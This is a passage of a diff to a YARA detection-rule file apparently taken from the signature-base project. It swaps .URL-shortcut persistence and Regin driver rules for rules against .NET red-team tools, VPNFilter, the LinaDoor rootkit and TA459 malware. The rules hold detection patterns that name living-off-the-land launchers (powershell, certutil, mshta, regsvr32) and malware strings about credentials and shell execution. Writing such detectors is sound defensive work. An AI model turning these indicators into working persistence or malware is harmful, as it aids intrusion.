 	strings:
-		$baseurl1 = "BASEURL=file://" nocase
-		$baseurl2 = "[DEFAULT]" nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$name = "CACTUSTORCH" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		all of ( $baseurl* ) and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Iconnotfromexeordllorico : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Pandasniper : FILE
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "82d0483f-48ee-5d0c-ba7d-73d9e9455423"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/ItsReallyNick/status/1176229087196696577"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L161-L179"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "006400fb-7e6d-563b-ba78-17937983c9ba"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/QAX-A-Team/PandaSniper"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L781-L794"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "957fe9f24d08033cf6e29d7e202e04bfb579577d3850a99e97da6b70924ae88e"
-		score = 50
-		quality = 60
+		logic_hash = "c5a32f22a429777186d88f3fcfa79ad4d971e86ebd6117df74aae19728c6addd"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$icon = "IconFile="
-		$icon_negate = /[\x0a\x0d]IconFile=[^\x0d]*\.(dll|exe|ico)\x0d/ nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$name = "PandaSniper" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		any of ( $url* ) and $icon and not $icon_negate and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Evasion : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Xbapappwhitelistbypasspoc : FILE
 {
 	meta:
-		description = "Non-standard .URLs and evasion"
-		author = "@itsreallynick (Nick Carr)"
-		id = "36df4252-2575-5efa-88ce-17e68a349306"
-		date = "2019-09-27"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/DissectMalware/status/1176736510856634368"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L181-L198"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "b05253ce-cba4-531d-8f39-d8fae71b114d"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/jpginc/xbapAppWhitelistBypassPOC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L796-L809"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c4fafae6af3ed5cc2e83e30427107d1c42cc4bc86d5c6a60e26953a11847029f"
-		score = 50
-		quality = 60
+		logic_hash = "3c79b70d3a72084dff391ba297518c4fe748d35b794278c4edf2d1faa4bd216e"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$URI = /[\x0a\x0d](IconFile|(Base|)URL)[^\x0d=]+/ nocase
-		$filetype_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$filetype_explicit = "[InternetShortcut]" nocase
+		$name = "xbapAppWhitelistBypassPOC" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		any of ( $filetype* ) and $URI and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Lolcommand : FILE
+rule SIGNATURE_BASE_HKTL_NET_NAME_Stagestrike : FILE
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "061e7919-17f1-5774-ad7d-fc964dc9a947"
-		date = "2019-09-27"
-		modified = "2021-02-14"
-		reference = "https://twitter.com/ItsReallyNick/status/1176601500069576704"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L201-L219"
+		description = "Detects .NET red/black-team tools via name"
+		author = "Arnim Rupp"
+		id = "e3f9de04-87f6-5b07-b5b0-a26167937fcc"
+		date = "2021-01-22"
+		modified = "2024-12-10"
+		reference = "https://github.com/RedXRanger/StageStrike"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_names.yar#L811-L824"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4ac9a555e61303a173443de2a189536c8ea0fc32ee73c589dd104275c7967c57"
-		score = 50
-		quality = 60
+		logic_hash = "99abc2fee732f27ea94c8ce244dc1742ed01a7753adedd7e80226d1e1c8dee4a"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=[^\x0d]*(powershell|cmd|certutil|mshta|wscript|cscript|rundll32|wmic|regsvr32|msbuild)(\.exe|)[^\x0d]{2,50}\x0d/ nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$name = "StageStrike" ascii wide
+		$compile = "AssemblyTitle" ascii wide
 
 	condition:
-		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Webdav : FILE
+rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_1 : FILE
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "cd660b84-d7c6-52fc-9e1d-76450e5262b1"
-		date = "2019-09-27"
+		description = "Detects VPNFilter malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dc50cb37-a6e7-5eb5-9581-31d7fd005e47"
+		date = "2018-05-24"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176243536754282497"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L222-L239"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_vpnfilter.yar#L11-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4fec084392140245eeb25bb512f3a4631ec6be08c197ec130a907fc118161197"
-		score = 50
-		quality = 60
+		logic_hash = "aff7b1f3d4afaf883c2702287ef7d6e13e01e80222ba336978d13deb21a93614"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f8286e29faa67ec765ae0244862f6b7914fcdde10423f96595cb84ad5cc6b344"
 
 	strings:
-		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=\s*\/\/[A-Za-z0-9]/
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s1 = "Login=" fullword ascii
+		$s2 = "Password=" fullword ascii
+		$s3 = "%s/rep_%u.bin" fullword ascii
+		$s4 = "%s:%uh->%s:%hu" fullword ascii
+		$s5 = "Password required" fullword ascii
+		$s6 = "password=" fullword ascii
+		$s7 = "Authorization: Basic" fullword ascii
+		$s8 = "/tmUnblock.cgi" fullword ascii
 
 	condition:
-		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		uint16( 0 ) == 0x457f and filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Scripturl : FILE
+rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_2 : FILE
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "2f55f8a9-4e4b-5480-9042-da6bb66b2e06"
-		date = "2019-09-27"
+		description = "Detects VPNFilter malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "95356303-e8ba-585d-b2fc-af9e10b0b93f"
+		date = "2018-05-24"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L241-L259"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_vpnfilter.yar#L33-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ece0013dbc9836fa800f99a10ab46c1eb081e1c04fe45fe17be26ffac1d464e9"
-		score = 50
-		quality = 60
+		logic_hash = "238ec4575fd8adbfa592e07b601313c71a08be8c776e78469aef8ad02e411798"
+		score = 75
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "50ac4fcd3fbc8abcaa766449841b3a0a684b3e217fc40935f1ac22c34c58a9ec"
 
 	strings:
-		$file1 = /[\x0a\x0d](IconFile|(Base|)URL)\s*=[^\x0d]*script:/ nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$s1 = "User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0)" fullword ascii
+		$s2 = "passwordPASSWORDpassword" fullword ascii
+		$s3 = "/tmp/client.key" fullword ascii
 
 	condition:
-		any of ( $url* ) and any of ( $file* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		uint16( 0 ) == 0x457f and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Workingdirremote_HTTP : FILE
+rule SIGNATURE_BASE_MAL_ELF_Vpnfilter_3 : FILE
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "68e54f8a-11e4-59e4-8498-59d88e70e438"
-		date = "2019-09-27"
+		description = "Detects VPNFilter malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "020603bf-fbce-5de1-82b9-5a2dfacfada3"
+		date = "2018-05-24"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L261-L278"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_vpnfilter.yar#L50-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c7c23c1253bf089519dec5f141f486425c6804640d9bffac9ce4c986ce25d323"
-		score = 50
+		logic_hash = "71152b57f2d6040608febf32441e1899fdf2479335c26c1143ea58759e6d9094"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0e0094d9bd396a6594da8e21911a3982cd737b445f591581560d766755097d92"
+		hash2 = "9683b04123d7e9fe4c8c26c69b09c2233f7e1440f828837422ce330040782d17"
+		hash3 = "37e29b0ea7a9b97597385a12f525e13c3a7d02ba4161a6946f2a7d978cc045b4"
+		hash4 = "0649fda8888d701eb2f91e6e0a05a2e2be714f564497c44a3813082ef8ff250b"
+		hash5 = "4b03288e9e44d214426a02327223b5e516b1ea29ce72fa25a2fcef9aa65c4b0b"
+		hash6 = "8a20dc9538d639623878a3d3d18d88da8b635ea52e5e2d0c2cce4a8c5a703db1"
+		hash7 = "776cb9a7a9f5afbaffdd4dbd052c6420030b2c7c3058c1455e0a79df0e6f7a1d"
 
 	strings:
-		$icon = "WorkingDirectory=http" nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$sx1 = "User-Agent: Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)" fullword ascii
+		$sx2 = "Execute by shell[%d]:" fullword ascii
+		$sx3 = "CONFIG.TOR.name:" fullword ascii
+		$s1 = "Executing command:  %s %s..." fullword ascii
+		$s2 = "/proc/%d/cmdline" fullword ascii
+		$a1 = "Mozilla/5.0 Firefox/50.0" fullword ascii
+		$a2 = "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0" fullword ascii
+		$a3 = "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0" fullword ascii
 
 	condition:
-		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		uint16( 0 ) == 0x457f and filesize < 1000KB and ( 1 of ( $sx* ) or 2 of ( $s* ) or 2 of ( $a* ) )
 }
-rule SIGNATURE_BASE_Methodology_Suspicious_Shortcut_Workingdirremote_SMB : FILE
+rule SIGNATURE_BASE_SUSP_ELF_Tor_Client : FILE
 {
 	meta:
-		description = "Detects possible shortcut usage for .URL persistence"
-		author = "@itsreallynick (Nick Carr)"
-		id = "26e19fe3-c25c-53b0-9b41-c04803134bc2"
-		date = "2019-09-27"
+		description = "Detects VPNFilter malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1be6528d-1b60-50da-8125-2ef73b8aeb4f"
+		date = "2018-05-24"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cglyer/status/1176184798248919044"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_url_persitence.yar#L280-L297"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_vpnfilter.yar#L80-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d9caa64ac730d34a2dcfb3368f8302849275b6ee16fe31f20978d72382b0d73"
-		score = 50
+		logic_hash = "2b67b32c5b8441c9b38e3bfeefa7f59c2767e29985adcba7d52e858847d37e47"
+		score = 65
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "afd281639e26a717aead65b1886f98d6d6c258736016023b4e59de30b7348719"
 
 	strings:
-		$icon = "WorkingDirectory=file://" nocase
-		$url_clsid = "[{000214A0-0000-0000-C000-000000000046}]"
-		$url_explicit = "[InternetShortcut]" nocase
+		$x1 = "We needed to load a secret key from %s, but it was encrypted. Try 'tor --keygen' instead, so you can enter the passphrase." fullword ascii
+		$x2 = "Received a VERSION cell with odd payload length %d; closing connection." fullword ascii
+		$x3 = "Please upgrade! This version of Tor (%s) is %s, according to the directory authorities. Recommended versions are: %s" fullword ascii
 
 	condition:
-		$icon and any of ( $url* ) and uint16( 0 ) != 0x5A4D and uint32( 0 ) != 0x464c457f and uint32( 0 ) != 0xBEBAFECA and uint32( 0 ) != 0xFEEDFACE and uint32( 0 ) != 0xFEEDFACF and uint32( 0 ) != 0xCEFAEDFE and filesize < 30KB
+		uint16( 0 ) == 0x457f and 1 of them
 }
-rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_A : FILE
+rule SIGNATURE_BASE_MAL_LNX_Linadoor_Rootkit_May22 : FILE
 {
 	meta:
-		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
-		author = "@Malwrsignatures - included in APT Scanner THOR"
-		id = "4cea1d45-b797-51b2-baa7-e66c8c0206ea"
-		date = "2014-11-23"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L14-L41"
+		description = "Detects LinaDoor Linux Rootkit"
+		author = "Florian Roth"
+		id = "e2f250b4-9a8a-5d70-83d7-5d12ad3763fb"
+		date = "2022-05-19"
+		modified = "2023-05-16"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lnx_linadoor_rootkit.yar#L2-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1cc367dff184f2b458a2b7c0c88a44095714525ca6bb115d03e6331cf1f22116"
-		score = 75
+		logic_hash = "546c34d4c204c7266884bb3b5b6ada418e83029ab88f72e5ffb094f50d9ed28e"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		hash1 = "187044596bc1328efa0ed636d8aa4a5c"
-		hash2 = "06665b96e293b23acc80451abb413e50"
-		hash3 = "d240f06e98c8d3e647cbf4d442d79475"
+		hash1 = "25ff1efe36eb15f8e19411886217d4c9ec30b42dca072b1bf22f041a04049cd9"
+		hash2 = "4792e22d4c9996af1cb58ed54fee921a7a9fdd19f7a5e7f268b6793cdd1ab4e7"
+		hash3 = "9067230a0be61347c0cf5c676580fc4f7c8580fc87c932078ad0c3f425300fb7"
+		hash4 = "940b79dc25d1988dabd643e879d18e5e47e25d0bb61c1f382f9c7a6c545bfcff"
+		hash5 = "a1df5b7e4181c8c1c39de976bbf6601a91cde23134deda25703bc6d9cb499044"
+		hash6 = "c4eea99658cd82d48aaddaec4781ce0c893de42b33376b6c60a949008a3efb27"
+		hash7 = "c5651add0c7db3bbfe0bbffe4eafe9cd5aa254d99be7e3404a2054d6e07d20e7"
 
 	strings:
-		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
-		$m1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
-		$s0 = "atapi.sys" fullword wide
-		$s1 = "disk.sys" fullword wide
-		$s3 = "h.data" fullword ascii
-		$s4 = "\\system32" ascii
-		$s5 = "\\SystemRoot" ascii
-		$s6 = "system" fullword ascii
-		$s7 = "temp" fullword ascii
-		$s8 = "windows" fullword ascii
-		$x1 = "LRich6" fullword ascii
-		$x2 = "KeServiceDescriptorTable" fullword ascii
+		$s1 = "/dev/net/.../rootkit_/" ascii
+		$s2 = "did_exec" ascii fullword
+		$s3 = "rh_reserved_tp_target" ascii fullword
+		$s4 = "HIDDEN_SERVICES" ascii fullword
+		$s5 = "bypass_udp_ports" ascii fullword
+		$s6 = "DoBypassIP" ascii fullword
+		$op1 = { 74 2a 4c 89 ef e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 4c 39 f2 }
+		$op2 = { e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 4c 39 f2 48 0f 46 c3 5b }
+		$op3 = { 48 89 c3 74 2a 4c 89 ef e8 00 00 00 00 48 89 da 4c 29 e2 48 01 c2 31 c0 }
+		$op4 = { 4c 29 e2 48 01 c2 31 c0 4c 39 f2 48 0f 46 c3 5b 41 5c 41 5d }
+		$fp1 = "/wgsyncdaemon.pid"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $m0 at 0 and $m1 and all of ( $s* ) and 1 of ( $x* )
+		uint16( 0 ) == 0x457f and filesize < 2000KB and 2 of them and not 1 of ( $fp* ) or 4 of them
 }
-rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_B : FILE
+rule SIGNATURE_BASE_TA459_Malware_May17_1 : FILE
 {
 	meta:
-		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
-		author = "@Malwrsignatures - included in APT Scanner THOR"
-		id = "14f31b2d-4753-54e8-891a-e28689ba57db"
-		date = "2014-11-23"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L43-L94"
+		description = "Detects TA459 related malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eb5d2464-ab95-5f5d-8b20-fa023da53130"
+		date = "2017-05-31"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/RLf9qU"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta459.yar#L12-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c2dee4f94f9eefb1c11f6e86144c6bfafc0845768200f5a839ffe3dd5d38294d"
+		logic_hash = "2655d4c3a28ad2f77bbf50cd3dface7de49f675f0f974aa44d9b69c3f803da30"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "ffb0b9b5b610191051a7bdf0806e1e47"
-		hash2 = "bfbe8c3ee78750c3a520480700e440f8"
-		hash3 = "b29ca4f22ae7b7b25f79c1d4a421139d"
-		hash4 = "06665b96e293b23acc80451abb413e50"
-		hash5 = "2c8b9d2885543d7ade3cae98225e263b"
-		hash6 = "4b6b86c7fec1c574706cecedf44abded"
-		hash7 = "187044596bc1328efa0ed636d8aa4a5c"
-		hash8 = "d240f06e98c8d3e647cbf4d442d79475"
-		hash9 = "6662c390b2bbbd291ec7987388fc75d7"
-		hash10 = "1c024e599ac055312a4ab75b3950040a"
-		hash11 = "ba7bb65634ce1e30c1e5415be3d1db1d"
-		hash12 = "b505d65721bb2453d5039a389113b566"
-		hash13 = "b269894f434657db2b15949641a67532"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5fd61793d498a395861fa263e4438183a3c4e6f1e4f098ac6e97c9d0911327bf"
 
 	strings:
-		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
-		$s1 = { 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e }
-		$s2 = "H.data" fullword ascii nocase
-		$s3 = "INIT" fullword ascii
-		$s4 = "ntoskrnl.exe" fullword ascii
-		$v1 = "\\system32" ascii
-		$v2 = "\\SystemRoot" ascii
-		$v3 = "KeServiceDescriptorTable" fullword ascii
-		$w1 = "\\system32" ascii
-		$w2 = "\\SystemRoot" ascii
-		$w3 = "LRich6" fullword ascii
-		$x1 = "_snprintf" ascii
-		$x2 = "_except_handler3" ascii
-		$y1 = "mbstowcs" fullword ascii
-		$y2 = "wcstombs" fullword ascii
-		$y3 = "KeGetCurrentIrql" fullword ascii
-		$z1 = "wcscpy" fullword ascii
-		$z2 = "ZwCreateFile" fullword ascii
-		$z3 = "ZwQueryInformationFile" fullword ascii
-		$z4 = "wcslen" fullword ascii
-		$z5 = "atoi" fullword ascii
+		$s3 = "xtsewy" fullword ascii
+		$s6 = "CW&mhAklnfVULL" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $m0 at 0 and all of ( $s* ) and ( all of ( $v* ) or all of ( $w* ) or all of ( $x* ) or all of ( $y* ) or all of ( $z* ) ) and filesize < 20KB
+		( uint16( 0 ) == 0x6152 and filesize < 800KB and all of them )
 }
-rule SIGNATURE_BASE_Regin_APT_Kerneldriver_Generic_C : FILE
+rule SIGNATURE_BASE_TA459_Malware_May17_2 : FILE
 {
 	meta:
-		description = "Generic rule for Regin APT kernel driver Malware - Symantec http://t.co/qu53359Cb2"
-		author = "@Malwrsignatures - included in APT Scanner THOR"
-		id = "2006b3f0-abd1-5274-8b18-75368671e062"
-		date = "2014-11-23"
-		modified = "2024-04-24"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_regin_fiveeyes.yar#L96-L122"
+		description = "Detects TA459 related malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "62954422-4657-5ded-9883-bb78eac697fb"
+		date = "2017-05-31"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/RLf9qU"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta459.yar#L28-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9454eb8b45a720fbe517caa2221fb0ceedf561902d94cabe513e921cc52fe035"
+		logic_hash = "9904f3905672e5209df037dff1fa2e4d88ee33531096045eb9b9f7460458b6a2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "e0895336617e0b45b312383814ec6783556d7635"
-		hash2 = "732298fa025ed48179a3a2555b45be96f7079712"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4601133e94c4bc74916a9d96a5bc27cc3125cdc0be7225b2c7d4047f8506b3aa"
 
 	strings:
-		$m0 = { 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 }
-		$s0 = "KeGetCurrentIrql" fullword ascii
-		$s1 = "5.2.3790.0 (srv03_rtm.030324-2048)" fullword wide
-		$s2 = "usbclass" fullword wide
-		$x1 = "PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING" ascii
-		$x2 = "Universal Serial Bus Class Driver" fullword wide
-		$x3 = "5.2.3790.0" fullword wide
-		$y1 = "LSA Shell" fullword wide
-		$y2 = "0Richw" fullword ascii
+		$a1 = "Mcutil.dll" fullword ascii
+		$a2 = "mcut.exe" fullword ascii
+		$s1 = "Software\\WinRAR SFX" fullword ascii
+		$s2 = "AYou may need to run this self-extracting archive as administrator" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $m0 at 0 and all of ( $s* ) and ( all of ( $x* ) or all of ( $y* ) ) and filesize < 20KB
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of ( $a* ) and 1 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Regin_Sig_Svcsstat : FILE
+
+rule SIGNATURE_BASE_MAL_RANSOM_Venus_Nov22_1 : FILE
 {
 	meta:
-		description = "Detects svcstat from Regin report - file svcsstat.exe_sample"
-		author = "@MalwrSignatures"
-		id = "0cb493d7-c7f1-54c4-9805-d9894bf399da"
-		date = "2014-11-26"
-		modified = "2024-04-24"
